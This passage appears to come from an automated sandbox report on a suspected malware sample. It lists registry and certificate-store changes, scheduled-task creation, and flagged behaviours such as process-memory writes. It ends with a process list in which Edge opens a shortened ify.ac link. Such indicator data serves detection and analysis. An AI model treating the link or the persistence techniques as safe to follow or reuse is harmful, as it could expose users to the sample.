| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1IZk
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
